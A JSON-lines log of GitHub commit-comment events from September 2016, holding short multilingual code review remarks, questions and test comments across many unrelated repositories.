{"id":"4547320547","type":"CommitCommentEvent","actor":{"login":"peterwang1996"},"repo":{"name":"xmjmsc/study1"},"payload":{"comment":{"id":18979822,"position":null,"line":null,"path":null,"commit_id":"051d444f65944d2dae9f16fe5c4f0632debee0c0","created_at":"2016-09-12T04:44:49Z","updated_at":"2016-09-12T04:44:49Z","body":"你觉得做起来比较轻松，可是你真的做好了吗？\r\n的确，在布局上你确实是有一些进步。\r\n但是你这个页面相比原页面省略了大量的细节，如果你不清楚的话，去对比一下原网页你就知道了。\r\n要知道我们正式写网页的时候，设计稿上的细节我们最起码要还原九成，你觉得你这个站跟你的模仿对象相似度有几成呢？\r\n还有，div的命名要有意义，否则你自己都没法维护你自己的代码。"}},"created_at":"2016-09-12T04:44:49Z"}
{"id":"4547321327","type":"CommitCommentEvent","actor":{"login":"samritchie"},"repo":{"name":"ReactiveX/RxSwift"},"payload":{"comment":{"id":18979823,"position":null,"line":null,"path":null,"commit_id":"2e8736b137064101cd98ee01523e6229825cecce","created_at":"2016-09-12T04:45:13Z","updated_at":"2016-09-12T04:45:13Z","body":"How are we meant to use these extensions now - is the idea to copy & paste the sample code?"}},"created_at":"2016-09-12T04:45:13Z"}
{"id":"4547325243","type":"CommitCommentEvent","actor":{"login":"Ashwiniakr"},"repo":{"name":"ksrdj/r-account-open"},"payload":{"comment":{"id":18979827,"position":null,"line":null,"path":null,"commit_id":"ddb248a3ca1d446aece16f8282003ba02883dcf9","created_at":"2016-09-12T04:47:06Z","updated_at":"2016-09-12T04:47:06Z","body":"Good attempt."}},"created_at":"2016-09-12T04:47:06Z"}
{"id":"4547328384","type":"CommitCommentEvent","actor":{"login":"ksrdj"},"repo":{"name":"ksrdj/r-account-open"},"payload":{"comment":{"id":18979831,"position":null,"line":null,"path":null,"commit_id":"0cdaf2a2c49d3fd6908361463ca820da80b7eb4b","created_at":"2016-09-12T04:48:38Z","updated_at":"2016-09-12T04:48:38Z","body":"sample for the coding"}},"created_at":"2016-09-12T04:48:38Z"}
{"id":"4547329435","type":"CommitCommentEvent","actor":{"login":"rapee"},"repo":{"name":"s-amon-s/delivery"},"payload":{"comment":{"id":18979833,"position":38,"line":5,"path":"application/controllers/Welcome.php","commit_id":"3571c7e34be0bca6a1de0ab5b7484a25edd4c919","created_at":"2016-09-12T04:49:11Z","updated_at":"2016-09-12T04:49:11Z","body":"MY_Controller ?"}},"created_at":"2016-09-12T04:49:11Z"}
{"id":"4547329495","type":"CommitCommentEvent","actor":{"login":"ksrdj"},"repo":{"name":"ksrdj/r-account-open"},"payload":{"comment":{"id":18979834,"position":null,"line":null,"path":null,"commit_id":"ddb248a3ca1d446aece16f8282003ba02883dcf9","created_at":"2016-09-12T04:49:13Z","updated_at":"2016-09-12T04:49:13Z","body":"thank you"}},"created_at":"2016-09-12T04:49:13Z"}
{"id":"4547330631","type":"CommitCommentEvent","actor":{"login":"rapee"},"repo":{"name":"s-amon-s/delivery"},"payload":{"comment":{"id":18979836,"position":63,"line":19,"path":"application/controllers/Welcome.php","commit_id":"3571c7e34be0bca6a1de0ab5b7484a25edd4c919","created_at":"2016-09-12T04:49:46Z","updated_at":"2016-09-12T04:49:46Z","body":"Choose one: single quote or double quote. Don't mix."}},"created_at":"2016-09-12T04:49:46Z"}
{"id":"4547331248","type":"CommitCommentEvent","actor":{"login":"Ashwiniakr"},"repo":{"name":"ksrdj/r-account-open"},"payload":{"comment":{"id":18979837,"position":null,"line":null,"path":null,"commit_id":"0cdaf2a2c49d3fd6908361463ca820da80b7eb4b","created_at":"2016-09-12T04:50:03Z","updated_at":"2016-09-12T04:50:03Z","body":"good example"}},"created_at":"2016-09-12T04:50:03Z"}
{"id":"4547334019","type":"CommitCommentEvent","actor":{"login":"elebumm"},"repo":{"name":"DowntownDevelopment/GeneratorWebService"},"payload":{"comment":{"id":18979840,"position":null,"line":null,"path":null,"commit_id":"987af8f1bcc6219c68b27d3cc91ab117e167c117","created_at":"2016-09-12T04:51:21Z","updated_at":"2016-09-12T04:51:21Z","body":"Your lack of Comic Sans.... Disturbs me..."}},"created_at":"2016-09-12T04:51:21Z"}
{"id":"4547337082","type":"CommitCommentEvent","actor":{"login":"Cadovvl"},"repo":{"name":"lilaspourpre/exploration_of_news"},"payload":{"comment":{"id":18979845,"position":15,"line":15,"path":"article_parser.py","commit_id":"c4b0455cd283e9e5dfc3b49a8b37a00d25633abd","created_at":"2016-09-12T04:52:51Z","updated_at":"2016-09-12T04:52:51Z","body":"Эх, молодая наивная девочка..."}},"created_at":"2016-09-12T04:52:51Z"}
{"id":"4547337089","type":"CommitCommentEvent","actor":{"login":"xiongtx"},"repo":{"name":"emacs-helm/helm"},"payload":{"comment":{"id":18979846,"position":16,"line":114,"path":"helm-org.el","commit_id":"20475c72b05a010a8dfcf289723583dcd5cbd822","created_at":"2016-09-12T04:52:51Z","updated_at":"2016-09-12T04:52:51Z","body":"I'm not sure this is a good idea, if only because the default keybinding for `org-refile` is `C-c C-w`. That's probably why the original binding was chosen in the first place."}},"created_at":"2016-09-12T04:52:51Z"}
{"id":"4547338513","type":"CommitCommentEvent","actor":{"login":"shoheis"},"repo":{"name":"hdfukuoka1985/phptrainning"},"payload":{"comment":{"id":18979847,"position":null,"line":null,"path":null,"commit_id":"c660213b9935079bf9ac89d9705a76527e5770b7","created_at":"2016-09-12T04:53:30Z","updated_at":"2016-09-12T04:53:30Z","body":"if文を書いて例外を投げる書き方が多いというのは、このように書くことが多いという意味で、今回の処理の中にはあえて書く必要はないかなと思います(書き方わかりづらかったですね;)。\r\n\r\nhttp://www.phppro.jp/phptips/archives/vol45/2\r\n\r\n```\r\nfunction div($val1, $val2) {  //割り算 \r\n  if ($val2 == 0){ \r\n    //例外発生 \r\n    throw new Exception(\"ゼロ除算\"); \r\n  } \r\n  $ans = $val1 / $val2; \r\n  return $ans; \r\n}\r\n```"}},"created_at":"2016-09-12T04:53:30Z"}
{"id":"4547338773","type":"CommitCommentEvent","actor":{"login":"Negamann303"},"repo":{"name":"Negamann303/Huawei-W-1.5-2.0"},"payload":{"comment":{"id":18979848,"position":null,"line":null,"path":null,"commit_id":"3a350f7445ed3a9f353c5b544db5dc0f9032a696","created_at":"2016-09-12T04:53:36Z","updated_at":"2016-09-12T04:53:36Z","body":"mv - not MHz"}},"created_at":"2016-09-12T04:53:36Z"}
{"id":"4547340502","type":"CommitCommentEvent","actor":{"login":"sbojchuk"},"repo":{"name":"IF-066-Java/bugTrckr"},"payload":{"comment":{"id":18979850,"position":16,"line":132,"path":"src/main/java/com/softserverinc/edu/controllers/ProjectController.java","commit_id":"68930d737296f2934a8cce748d6fbdd136a56696","created_at":"2016-09-12T04:54:29Z","updated_at":"2016-09-12T04:54:29Z","body":"this esle is redundant"}},"created_at":"2016-09-12T04:54:29Z"}
{"id":"4547342285","type":"CommitCommentEvent","actor":{"login":"x421"},"repo":{"name":"PullNotifications/PullNotifications"},"payload":{"comment":{"id":18979852,"position":null,"line":null,"path":null,"commit_id":"eb02f1aafe8e1c7c795baaf69784acd35ce0f986","created_at":"2016-09-12T04:55:19Z","updated_at":"2016-09-12T04:55:19Z","body":"👍 thanks. Gitignore.io messed that one up. "}},"created_at":"2016-09-12T04:55:19Z"}
{"id":"4547343066","type":"CommitCommentEvent","actor":{"login":"qiangxi"},"repo":{"name":"qiangxi/mdswzl"},"payload":{"comment":{"id":18979854,"position":null,"line":null,"path":null,"commit_id":"78bd7e0632f6e79b87fa9ee53b01e37b5f042df5","created_at":"2016-09-12T04:55:42Z","updated_at":"2016-09-12T04:55:42Z","body":"用户开源须知"}},"created_at":"2016-09-12T04:55:42Z"}
{"id":"4547346702","type":"CommitCommentEvent","actor":{"login":"sbojchuk"},"repo":{"name":"IF-066-Java/bugTrckr"},"payload":{"comment":{"id":18979856,"position":20,"line":186,"path":"src/main/java/com/softserverinc/edu/services/UserService.java","commit_id":"68930d737296f2934a8cce748d6fbdd136a56696","created_at":"2016-09-12T04:57:31Z","updated_at":"2016-09-12T04:57:31Z","body":"there is method: `UserRole.isDeveloper()`"}},"created_at":"2016-09-12T04:57:31Z"}
{"id":"4547349201","type":"CommitCommentEvent","actor":{"login":"tecniques"},"repo":{"name":"Lunat1q/Catchem-PoGo"},"payload":{"comment":{"id":18979860,"position":null,"line":null,"path":null,"commit_id":"1aa326148e1e91aa8c1e013c5c3ecaec11cb42b2","created_at":"2016-09-12T04:58:48Z","updated_at":"2016-09-12T04:58:48Z","body":"Boa noite, a opção \"use poke not to catch filter\" nao funciona corretamente, mesmo colocando para usar a great ou ultra ball para capturar pokemon acima de 90 de iv, o programa utiliza as balls de qualquer jeito.\r\n\r\nSeria possivel uma atualização para especificar quantas balls guardar?\r\n\r\ntipo: pokeballs - 50\r\n        Greatballs - 80\r\n        Ultraballs - 100"}},"created_at":"2016-09-12T04:58:48Z"}
{"id":"4547349517","type":"CommitCommentEvent","actor":{"login":"tecniques"},"repo":{"name":"Lunat1q/Catchem-PoGo"},"payload":{"comment":{"id":18979861,"position":null,"line":null,"path":null,"commit_id":"1aa326148e1e91aa8c1e013c5c3ecaec11cb42b2","created_at":"2016-09-12T04:58:56Z","updated_at":"2016-09-12T04:58:56Z","body":"Good night, the \"use poke not to catch filter\" does not work properly, even putting to use the great or ultra ball to capture pokemon above 90 iv, the program uses the balls anyway.\r\n\r\nIt would be possible an update to specify how many balls store?\r\n\r\ntype: pokeballs - 50\r\n         Greatballs - 80\r\n         Ultraballs - 100"}},"created_at":"2016-09-12T04:58:56Z"}
{"id":"4547349738","type":"CommitCommentEvent","actor":{"login":"lilaspourpre"},"repo":{"name":"lilaspourpre/exploration_of_news"},"payload":{"comment":{"id":18979863,"position":15,"line":15,"path":"article_parser.py","commit_id":"c4b0455cd283e9e5dfc3b49a8b37a00d25633abd","created_at":"2016-09-12T04:59:03Z","updated_at":"2016-09-12T04:59:03Z","body":"\nА тебя с праздничком!:3 lundi, 12 septembre 2016, 07:52AM +03:00 de Cadovvl < notifications@github.com> :\n\n>Эх, молодая наивная девочка...\n>—\n>You are receiving this because you authored the thread.\n>Reply to this email directly,  view it on GitHub , or  mute the thread .\n"}},"created_at":"2016-09-12T04:59:03Z"}
{"id":"4547352343","type":"CommitCommentEvent","actor":{"login":"peterwang1996"},"repo":{"name":"hobofire/work"},"payload":{"comment":{"id":18979865,"position":null,"line":null,"path":null,"commit_id":"e9c95c4b96bcc4c5edcd201debf83aa966f2ad8c","created_at":"2016-09-12T05:00:16Z","updated_at":"2016-09-12T05:00:16Z","body":"除了下巴还是没有完美居中，以及这个让我蛋疼无比的目录名以外，其他的我都还比较满意。\r\n自己加了网站的 Icon ，可以，很强势。\r\n第二周的任务比这个稍微复杂一些，加油干吧~"}},"created_at":"2016-09-12T05:00:16Z"}
{"id":"4547358652","type":"CommitCommentEvent","actor":{"login":"shyamsathyanathan"},"repo":{"name":"hariksetra/ISKCON-Preaching-Assistant"},"payload":{"comment":{"id":18979872,"position":5,"line":6,"path":"project/PreachingAssistant/src/main/resources/application.properties","commit_id":"731cb8ee0af72ca88f878be988ac45701c36fdd3","created_at":"2016-09-12T05:03:03Z","updated_at":"2016-09-12T05:03:03Z","body":"Don't you think it is best we don't alter these values as it may vary from one person's setup to another? I think it would be best if we worked on separate branches and resolved these issues during merge."}},"created_at":"2016-09-12T05:03:03Z"}
{"id":"4547359070","type":"CommitCommentEvent","actor":{"login":"trangnguyen88"},"repo":{"name":"trangnguyen88/Chapter2"},"payload":{"comment":{"id":18979876,"position":null,"line":null,"path":null,"commit_id":"78022d2049a343fe750c671cda5d0070aa238be5","created_at":"2016-09-12T05:03:15Z","updated_at":"2016-09-12T05:03:15Z","body":"adding the FAQ page and sign up page."}},"created_at":"2016-09-12T05:03:15Z"}
{"id":"4547359690","type":"CommitCommentEvent","actor":{"login":"jxmorris12"},"repo":{"name":"cavdailyonline/thecavalierdani"},"payload":{"comment":{"id":18979879,"position":null,"line":null,"path":null,"commit_id":"99f6f6b72ae24cb988fbde1c7f980fd14b6b8292","created_at":"2016-09-12T05:03:33Z","updated_at":"2016-09-12T05:03:33Z","body":"nice"}},"created_at":"2016-09-12T05:03:33Z"}
{"id":"4547361448","type":"CommitCommentEvent","actor":{"login":"Xottab-DUTY"},"repo":{"name":"OpenXRay/xray-16"},"payload":{"comment":{"id":18979880,"position":null,"line":null,"path":null,"commit_id":"32005e8e253ff084469ca19e405de2b2a35c4c90","created_at":"2016-09-12T05:04:22Z","updated_at":"2016-09-12T05:04:22Z","body":"Maybe this should be indicated as a bug fix in \"Changes\" page on wiki."}},"created_at":"2016-09-12T05:04:22Z"}
{"id":"4547366519","type":"CommitCommentEvent","actor":{"login":"vitalidze"},"repo":{"name":"vitalidze/traccar-web"},"payload":{"comment":{"id":18979883,"position":null,"line":null,"path":null,"commit_id":"7a5196abd5c29fa3f4ad761a58c2c4e7d625507f","created_at":"2016-09-12T05:06:45Z","updated_at":"2016-09-12T05:06:45Z","body":"> Edit: I must edit the source code using Netbeans etc. and then create .war file?\r\n\r\nYes. You can use any text editor actually, not NetBeans if you are not planning to write some additional code. Then build the `traccar-web.war` file by following official instructions: http://traccar.litvak.su/building.html"}},"created_at":"2016-09-12T05:06:45Z"}
{"id":"4547376498","type":"CommitCommentEvent","actor":{"login":"shinpeimuraoka"},"repo":{"name":"osrg/ryu-book"},"payload":{"comment":{"id":18979897,"position":null,"line":null,"path":null,"commit_id":"282a34b5d81cc7ca6b5dde083d38b144d849c821","created_at":"2016-09-12T05:11:27Z","updated_at":"2016-09-12T05:11:27Z","body":"ご指摘の様にタイトルを以下に修正します。\r\n```\r\nReduce the version values of OpenFlow parser\r\n```\r\nまた、最後の文章もいかに修正します。\r\n```\r\nThis patch displays the OpenFlow1.3 parser only.\r\n```\r\n"}},"created_at":"2016-09-12T05:11:27Z"}
{"id":"4547377335","type":"CommitCommentEvent","actor":{"login":"shoheis"},"repo":{"name":"hdfukuoka1985/phptrainning"},"payload":{"comment":{"id":18979900,"position":38,"line":38,"path":"issue11-2/edit.php","commit_id":"10fdec486f4b95dcd29e6f964b19e8780e95deeb","created_at":"2016-09-12T05:11:50Z","updated_at":"2016-09-12T05:11:50Z","body":"この形でformの中に入れてaction先\"update.php\"で受け取ることができるのか、改めて確認しましょう。\r\nHTMLのformからデータをリクエストした時、サーバ側のPHPでどのように受け取ったかということになります。\r\nIssue でいうと #3 の内容ですね。"}},"created_at":"2016-09-12T05:11:50Z"}
{"id":"4547379562","type":"CommitCommentEvent","actor":{"login":"atamariya"},"repo":{"name":"UniversalMediaServer/UniversalMediaServer"},"payload":{"comment":{"id":18979903,"position":null,"line":null,"path":null,"commit_id":"dba09ef68b315d33e84ead94780a0c60f4aaa3f8","created_at":"2016-09-12T05:12:55Z","updated_at":"2016-09-12T05:12:55Z","body":"@Sami32 Correct."}},"created_at":"2016-09-12T05:12:55Z"}
{"id":"4547380217","type":"CommitCommentEvent","actor":{"login":"nanosoldier"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":18979904,"position":null,"line":null,"path":null,"commit_id":"9a4060704c686318195c5d4ccdce2a022ef2c696","created_at":"2016-09-12T05:13:13Z","updated_at":"2016-09-12T05:13:13Z","body":"[Your benchmark job](https://github.com/JuliaLang/julia/commit/9a4060704c686318195c5d4ccdce2a022ef2c696#commitcomment-18979682) has completed - no performance regressions were detected. A full report can be found [here](https://github.com/JuliaCI/BaseBenchmarkReports/blob/031decba493bb3316723ce5555ac86e075061908/daily_2016_9_12/report.md). cc @jrevels"}},"created_at":"2016-09-12T05:13:13Z"}
{"id":"4547383044","type":"CommitCommentEvent","actor":{"login":"sumura80"},"repo":{"name":"sumura80/video.tutorial123"},"payload":{"comment":{"id":18979909,"position":null,"line":null,"path":null,"commit_id":"d0da7826bc7693ac6a1f41829dfc26d7de12ec1b","created_at":"2016-09-12T05:14:40Z","updated_at":"2016-09-12T05:14:40Z","body":"deleting test file"}},"created_at":"2016-09-12T05:14:40Z"}
{"id":"4547384653","type":"CommitCommentEvent","actor":{"login":"LWTechGaming"},"repo":{"name":"SteamingMutt/WildBeast"},"payload":{"comment":{"id":18979912,"position":null,"line":null,"path":null,"commit_id":"69a26f5e8f6866ccc52f84077555ec724fae36a1","created_at":"2016-09-12T05:15:32Z","updated_at":"2016-09-12T05:15:32Z","body":"@Miwrzezl :eyes: "}},"created_at":"2016-09-12T05:15:32Z"}
{"id":"4547387712","type":"CommitCommentEvent","actor":{"login":"EMayej"},"repo":{"name":"fish-shell/fish-shell"},"payload":{"comment":{"id":18979917,"position":24,"line":39,"path":"share/functions/__fish_config_interactive.fish","commit_id":"90e535f66f27e2ef39f8522840abb74db12d2f17","created_at":"2016-09-12T05:17:00Z","updated_at":"2016-09-12T05:17:00Z","body":"command substitution does not happen. Maybe you don't want surrounding quotes.\r\n\r\necho \"$HOME/fish_previous_colors-(date).txt\"\r\n/Users/EMayej/fish_previous_colors-(date).txt\r\n\r\n echo $HOME/fish_previous_colors-(date).txt\r\n/Users/EMayej/fish_previous_colors-Mon Sep 12 13:14:07 CST 2016.txt\r\n\r\necho $HOME/fish_previous_colors-(date '+%Y%m%d%H%M%S').txt /Users/EMayej/fish_previous_colors-20160912131557.txt\r\n"}},"created_at":"2016-09-12T05:17:00Z"}
{"id":"4547387810","type":"CommitCommentEvent","actor":{"login":"luastoned"},"repo":{"name":"luastoned/turbo-telegram"},"payload":{"comment":{"id":18979918,"position":397,"line":385,"path":"telegram.lua","commit_id":"3e12303127fe9f3a39f7af088d43a278173aea19","created_at":"2016-09-12T05:17:02Z","updated_at":"2016-09-12T05:17:02Z","body":"The idiom with `.` and `:` is called syntactic sugar, you should be able to find more examples on google.\r\nlocal str = \"syntactic sugar\"\r\nlocal length = string.len(str) -- same as str:len()\r\n\r\nI'll add the MIT license."}},"created_at":"2016-09-12T05:17:02Z"}
{"id":"4547389896","type":"CommitCommentEvent","actor":{"login":"ktsaou"},"repo":{"name":"firehol/netdata"},"payload":{"comment":{"id":18979922,"position":19,"line":28,"path":"conf.d/health_alarm_notify.conf","commit_id":"512266bf55bf13f076a73dba2ace264e9f81163a","created_at":"2016-09-12T05:18:07Z","updated_at":"2016-09-12T05:18:07Z","body":"It now works with and without a comma (it parses this line with and without a comma and re-generates it always with a comma)."}},"created_at":"2016-09-12T05:18:07Z"}
{"id":"4547390290","type":"CommitCommentEvent","actor":{"login":"Hellllll"},"repo":{"name":"Hellllll/FE-Study"},"payload":{"comment":{"id":18979923,"position":null,"line":null,"path":null,"commit_id":"ab5854ee7a7607bd43f0aa76815c7dc5c4a9d002","created_at":"2016-09-12T05:18:19Z","updated_at":"2016-09-12T05:18:19Z","body":"制定计划"}},"created_at":"2016-09-12T05:18:19Z"}
{"id":"4547391281","type":"CommitCommentEvent","actor":{"login":"vishal68"},"repo":{"name":"vishal68/only-joomla"},"payload":{"comment":{"id":18979924,"position":null,"line":null,"path":null,"commit_id":"f049220fcc8bebd5a0664729834642da3ae11256","created_at":"2016-09-12T05:18:52Z","updated_at":"2016-09-12T05:18:52Z","body":"ass"}},"created_at":"2016-09-12T05:18:52Z"}
{"id":"4547394118","type":"CommitCommentEvent","actor":{"login":"salv-orlando"},"repo":{"name":"roeych/neutron"},"payload":{"comment":{"id":18979926,"position":22,"line":22,"path":"neutron/services/address_group/plugin.py","commit_id":"fcdbea6babf274562b7e8f7efe36236ac8e939a4","created_at":"2016-09-12T05:20:18Z","updated_at":"2016-09-12T05:20:18Z","body":"Is this intentional?\r\n\r\nThe end result would be to create URIs like /v2/address-groups/address-group"}},"created_at":"2016-09-12T05:20:18Z"}
{"id":"4547394148","type":"CommitCommentEvent","actor":{"login":"aviouy"},"repo":{"name":"air-fix/backend"},"payload":{"comment":{"id":18979927,"position":null,"line":null,"path":null,"commit_id":"9fa9a1dec8bc7c89a32f298465a7e4014f200309","created_at":"2016-09-12T05:20:19Z","updated_at":"2016-09-12T05:20:19Z","body":"test"}},"created_at":"2016-09-12T05:20:19Z"}
{"id":"4547394233","type":"CommitCommentEvent","actor":{"login":"krzyzanowskim"},"repo":{"name":"krzyzanowskim/CryptoSwift"},"payload":{"comment":{"id":18979928,"position":null,"line":null,"path":null,"commit_id":"9d24227c379d655ffb1b9ff74d40760065272cba","created_at":"2016-09-12T05:20:21Z","updated_at":"2016-09-12T05:20:21Z","body":"you jave to add it manually. press + in left corner and setup new build phase for your extrnsion target"}},"created_at":"2016-09-12T05:20:21Z"}
{"id":"4547395679","type":"CommitCommentEvent","actor":{"login":"vgrigoriu"},"repo":{"name":"g-un--/fsharpscripts"},"payload":{"comment":{"id":18979932,"position":18,"line":18,"path":"freeCalc.fsx","commit_id":"b277e569af44c0f0933b3e77b020be16cd2870f3","created_at":"2016-09-12T05:21:05Z","updated_at":"2016-09-12T05:21:05Z","body":"Mda, pare că tre' să citesc tot saitu' cela..."}},"created_at":"2016-09-12T05:21:05Z"}
{"id":"4547397289","type":"CommitCommentEvent","actor":{"login":"zidaneandmessi"},"repo":{"name":"KuribohG/mfpoj"},"payload":{"comment":{"id":18979933,"position":null,"line":null,"path":null,"commit_id":"88168cde535b561fd6fd0c6296489d4adce7bced","created_at":"2016-09-12T05:21:54Z","updated_at":"2016-09-12T05:21:54Z","body":"hahaha"}},"created_at":"2016-09-12T05:21:54Z"}
{"id":"4547400090","type":"CommitCommentEvent","actor":{"login":"salv-orlando"},"repo":{"name":"roeych/neutron"},"payload":{"comment":{"id":18979940,"position":117,"line":117,"path":"neutron/extensions/address_group.py","commit_id":"fcdbea6babf274562b7e8f7efe36236ac8e939a4","created_at":"2016-09-12T05:23:19Z","updated_at":"2016-09-12T05:23:19Z","body":"dict(list(some_dict.items())) is found in cases where you need to concatenate dicts.\r\nI do not see a need for using it here, is there one?"}},"created_at":"2016-09-12T05:23:19Z"}
{"id":"4547403100","type":"CommitCommentEvent","actor":{"login":"bridiver"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":18979949,"position":null,"line":null,"path":null,"commit_id":"8b9ff8ff844af1e6509baf0e7831c0dad4dba8ed","created_at":"2016-09-12T05:24:49Z","updated_at":"2016-09-12T05:24:49Z","body":"ugh, stupid case insensitive filesystem. I need to backup/restore my mac with the case sensitive option"}},"created_at":"2016-09-12T05:24:49Z"}
{"id":"4547405383","type":"CommitCommentEvent","actor":{"login":"pardeike"},"repo":{"name":"pardeike/RimWorld-Achtung-Mod"},"payload":{"comment":{"id":18979955,"position":45,"line":13,"path":"Source/AchtungMod/Controller.cs","commit_id":"7f285844f90ea675bd7fa0d722e0696b2d6bf2e9","created_at":"2016-09-12T05:25:58Z","updated_at":"2016-09-12T05:25:58Z","body":"Until an on/off feature is implemented: yes"}},"created_at":"2016-09-12T05:25:58Z"}
{"id":"4547407267","type":"CommitCommentEvent","actor":{"login":"frank-kunz-nsn"},"repo":{"name":"RapidIO/kernel-rapidio"},"payload":{"comment":{"id":18979957,"position":4,"line":1903,"path":"rio.c","commit_id":"af9c93dc7ec6fe2623d476c7e528b3b963d1c848","created_at":"2016-09-12T05:26:55Z","updated_at":"2016-09-12T05:26:55Z","body":"How to deal with mports that do not support CRF?\r\n\r\nJust cut off the lsb of the prio filed?"}},"created_at":"2016-09-12T05:26:55Z"}
{"id":"4547408456","type":"CommitCommentEvent","actor":{"login":"lingshitinghai"},"repo":{"name":"yxyClear/TestProject"},"payload":{"comment":{"id":18979958,"position":null,"line":null,"path":null,"commit_id":"df77f6ff4beada0179aedb91e55fa7efc8687bf9","created_at":"2016-09-12T05:27:26Z","updated_at":"2016-09-12T05:27:26Z","body":"test2"}},"created_at":"2016-09-12T05:27:26Z"}
{"id":"4547409146","type":"CommitCommentEvent","actor":{"login":"Klozz"},"repo":{"name":"XPerience-AOSP-Lollipop/android_frameworks_base"},"payload":{"comment":{"id":18979959,"position":null,"line":null,"path":null,"commit_id":"52ad2b637806769ec224d97d19e49a1c9676fe5e","created_at":"2016-09-12T05:27:44Z","updated_at":"2016-09-12T05:27:44Z","body":"Borrable si es molesto "}},"created_at":"2016-09-12T05:27:44Z"}
{"id":"4547409769","type":"CommitCommentEvent","actor":{"login":"wonanut"},"repo":{"name":"wonanut/Test"},"payload":{"comment":{"id":18979964,"position":2,"line":2,"path":"README.md","commit_id":"de0a1c0f9d30f58737d46d56b1c89241e4f70223","created_at":"2016-09-12T05:28:02Z","updated_at":"2016-09-12T05:28:02Z","body":"hello, a test"}},"created_at":"2016-09-12T05:28:02Z"}
{"id":"4547411964","type":"CommitCommentEvent","actor":{"login":"nomadtungus"},"repo":{"name":"nomadtungus/hello-world"},"payload":{"comment":{"id":18979969,"position":null,"line":null,"path":null,"commit_id":"5cadaa28f89e64437090457e8dc6c78a43f5df11","created_at":"2016-09-12T05:29:06Z","updated_at":"2016-09-12T05:29:06Z","body":"this is my comment on first commit"}},"created_at":"2016-09-12T05:29:06Z"}
{"id":"4547415802","type":"CommitCommentEvent","actor":{"login":"Eclair"},"repo":{"name":"OfficeDev/office-ui-fabric-ios"},"payload":{"comment":{"id":18979977,"position":15,"line":15,"path":"OfficeUIFabricCore.podspec","commit_id":"16c58231f606aa0f4a798592048774d2ccfb2e0b","created_at":"2016-09-12T05:30:51Z","updated_at":"2016-09-12T05:30:51Z","body":"Does it require to change min ios version?"}},"created_at":"2016-09-12T05:30:51Z"}
{"id":"4547416720","type":"CommitCommentEvent","actor":{"login":"frank-kunz-nsn"},"repo":{"name":"RapidIO/kernel-rapidio"},"payload":{"comment":{"id":18979978,"position":12,"line":1911,"path":"rio.c","commit_id":"af9c93dc7ec6fe2623d476c7e528b3b963d1c848","created_at":"2016-09-12T05:31:19Z","updated_at":"2016-09-12T05:31:19Z","body":"Could it be that a DMA_DEV_TO_MEM (read) transfer request might be triggered with prio level > 6 here?"}},"created_at":"2016-09-12T05:31:19Z"}
{"id":"4547416847","type":"CommitCommentEvent","actor":{"login":"kit90"},"repo":{"name":"Matroska-Org/ebml-specification"},"payload":{"comment":{"id":18979979,"position":null,"line":null,"path":null,"commit_id":"96f9893d1f1ed5b822514aa284828ea30a97c7d6","created_at":"2016-09-12T05:31:22Z","updated_at":"2016-09-12T05:31:22Z","body":"Hi, so far there have been four attempts at standardisation of the C language - ISO/IEC 9899:1990, 9899:1990/Amd 1:1995, 9899:1999 and 9899:2011. AFAIK the hexadecimal floating point notation was first adopted in 1999, not 1990. But since the 2011 standard supersedes all others and is the valid one during the current standardisation of EBML, IMHO it would be better to cite it."}},"created_at":"2016-09-12T05:31:22Z"}
{"id":"4547418526","type":"CommitCommentEvent","actor":{"login":"thierryvolpiatto"},"repo":{"name":"emacs-helm/helm"},"payload":{"comment":{"id":18979982,"position":16,"line":114,"path":"helm-org.el","commit_id":"20475c72b05a010a8dfcf289723583dcd5cbd822","created_at":"2016-09-12T05:32:06Z","updated_at":"2016-09-12T05:32:06Z","body":"\nTianxiang Xiong <notifications@github.com> writes:\n\n> I'm not sure this is a good idea, if only because the default\n> keybinding for org-refile is C-c C-w.\n\nAh, ok so what do you prefer ? `C-c C-w` or `C-c w` ?\n\n--\nThierry\n"}},"created_at":"2016-09-12T05:32:06Z"}
{"id":"4547420317","type":"CommitCommentEvent","actor":{"login":"Wijaxu"},"repo":{"name":"Nukem9/LinkerMod"},"payload":{"comment":{"id":18979985,"position":null,"line":null,"path":null,"commit_id":"332ee934c094e1e1ab1ea01c82e33ab0bfbd5684","created_at":"2016-09-12T05:32:56Z","updated_at":"2016-09-12T05:32:56Z","body":"hm .__."}},"created_at":"2016-09-12T05:32:56Z"}
{"id":"4547424409","type":"CommitCommentEvent","actor":{"login":"JangJiYeon"},"repo":{"name":"CafeIN-kh/CafeIN"},"payload":{"comment":{"id":18979989,"position":null,"line":null,"path":null,"commit_id":"bda00ea8a1309b4d26a4cacca59814e7b481f16e","created_at":"2016-09-12T05:34:45Z","updated_at":"2016-09-12T05:34:45Z","body":"메인 커스텀 메뉴 작성자 u_uid가 아닌 u_name으로 변경해주세요~"}},"created_at":"2016-09-12T05:34:45Z"}
{"id":"4547427059","type":"CommitCommentEvent","actor":{"login":"SE2Dev"},"repo":{"name":"Nukem9/LinkerMod"},"payload":{"comment":{"id":18979992,"position":null,"line":null,"path":null,"commit_id":"332ee934c094e1e1ab1ea01c82e33ab0bfbd5684","created_at":"2016-09-12T05:35:56Z","updated_at":"2016-09-12T05:35:56Z","body":"._.\n"}},"created_at":"2016-09-12T05:35:56Z"}
{"id":"4547428096","type":"CommitCommentEvent","actor":{"login":"shoheis"},"repo":{"name":"hdfukuoka1985/phptrainning"},"payload":{"comment":{"id":18979994,"position":41,"line":41,"path":"issue11-2/edit.php","commit_id":"10fdec486f4b95dcd29e6f964b19e8780e95deeb","created_at":"2016-09-12T05:36:22Z","updated_at":"2016-09-12T05:36:22Z","body":"ここあたりの書き方なのですが、<?php ?>で囲んでechoで出すよりも、HTMLの中の動的に出力したい部分のみPHPを埋め込むという書き方にしたほうが良いかと思います。\r\n\r\nhttp://www.atmarkit.co.jp/ait/articles/1403/07/news028.html\r\n\r\nの\r\n```\r\n<!DOCTYPE HTML>\r\n<html lang=\"ja\">\r\n<head>\r\n<meta charset=\"utf-8\">\r\n<title>PHPサンプル</title>\r\n</head>\r\n<body>\r\n<p><?php echo 'Hello, World!' ?></p>\r\n</body>\r\n</html>\r\n```\r\nのイメージです。"}},"created_at":"2016-09-12T05:36:22Z"}
